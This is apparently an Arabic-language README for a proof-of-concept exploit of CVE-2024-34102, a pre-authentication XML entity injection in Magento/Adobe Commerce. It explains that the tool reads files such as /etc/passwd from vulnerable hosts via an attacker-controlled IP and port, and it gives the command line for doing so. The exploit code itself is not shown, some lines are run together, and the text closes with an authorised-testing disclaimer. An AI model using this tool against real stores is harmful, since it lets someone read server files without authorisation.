
إثبات المفهوم لـ CVE-2024-34102. مشكلة حقن كيان XML قبل المصادقة في Magento / Adobe Commerce.
POC لـ CVE-2024-34102. مشكلة حقن كيان XML قبل المصادقة في Magento / Adobe Commerce.

سيحاول هذا POC قراءة الملفات من المضيفين المستهدفين المعرضين للثغرة الأخيرة في Magento / Adobe Commerce CVE-2024-34102. يعتمد هذا POC على هذا التنبيه الأمني وهذا البحث من Assetnote.
لتشغيل هذا الـ POC، يجب أن يكون لديك جهاز بعنوان IP منشور وقابل للوصول.
poc.xml يحتوي على الحمولات الرئيسية./etc/passwd).requestsلاستخدام هذا الـ POC ضد هدف واحد:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
لأي اقتراحات أو أفكار، يرجى التواصل معي.
هذه الأداة المقدمة هي لأغراض تعليمية فقط. لا أشجع أو أقر أو أدعم الوصول غير المصرح به إلى أي نظام أو شبكة. استخدم هذه الأداة بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. أي إجراءات وعواقب ناتجة عن سوء استخدام هذه الأداة هي مسؤوليتك وحدك.